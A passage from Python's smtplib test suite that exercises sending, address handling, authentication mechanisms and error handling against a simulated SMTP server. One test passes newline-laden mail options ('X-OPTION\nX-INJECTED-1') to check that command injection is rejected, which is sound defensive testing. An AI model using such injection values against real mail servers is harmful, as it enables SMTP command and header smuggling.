# see: https://bugs.python.org/issue43124
# connect and send mail
m = 'wazzuuup\nlinetwo'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail("[email protected]", "[email protected]", m)
with self.assertRaises(ValueError) as exc:
smtp.mail("[email protected]", ["X-OPTION\nX-INJECTED-1", "X-OPTION2\nX-INJECTED-2"])
msg = str(exc.exception)
self.assertIn("prohibited newline characters", msg)
self.assertIn("X-OPTION\\nX-INJECTED-1 X-OPTION2\\nX-INJECTED-2", msg)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
debugout = smtpd.DEBUGSTREAM.getvalue()
self.assertNotIn("X-OPTION", debugout)
self.assertNotIn("X-OPTION2", debugout)
self.assertNotIn("X-INJECTED-1", debugout)
self.assertNotIn("X-INJECTED-2", debugout)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<[email protected]>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'[email protected]'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='[email protected]', to_addrs='[email protected]')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'[email protected]'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = '[email protected]'
m['Resent-To'] = 'Martha <[email protected]>, Jeff'
m['Resent-Bcc'] = '[email protected]'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('[email protected]', 'Jeff', '[email protected]'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = '[email protected]'
m['Resent-To'] = 'Martha <[email protected]>, Jeff'
m['Resent-Bcc'] = '[email protected]'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = '[email protected]'
m['Resent-From'] = 'Martha <[email protected]>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <fő[email protected]>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_helper.threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = socket_helper.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
threading_helper.join_thread(self.thread)
del self.thread
self.doCleanups()
threading_helper.threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'[email protected]':'John A',
'[email protected]':'Sally B',
'[email protected]':'Ruth C',
}
sim_auth = ('[email protected]', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['[email protected]','[email protected]'],
'list-2':['[email protected]',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_buggy(self, arg=None):
# This AUTH mechanism will 'trap' client in a neverending 334
# base64 encoded 'BuGgYbUgGy'
self.push('334 QnVHZ1liVWdHeQ==')
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_helper.threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
threading_helper.join_thread(self.thread)
del self.thread
self.doCleanups()
threading_helper.threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = '[email protected]'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN_initial_response_ok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=True)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_LOGIN_initial_response_notok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=False)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_BUGGY(self):
self.serv.add_feature("AUTH BUGGY")
def auth_buggy(challenge=None):
self.assertEqual(b"BuGgYbUgGy", challenge)
return "\0"
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT
)
try:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_buggy")
expect = r"^Server AUTH mechanism infinite loop.*"
with self.assertRaisesRegex(smtplib.SMTPException, expect) as cm:
smtp.auth("BUGGY", auth_buggy, initial_response_ok=False)
finally:
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('[email protected]', ['[email protected]'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <fő[email protected]>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', '[email protected]'))
message['To'] = email.utils.formataddr(('René', '[email protected]'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], '[email protected]')
self.assertEqual(self.serv._addresses['tos'], ['[email protected]'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_helper.threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
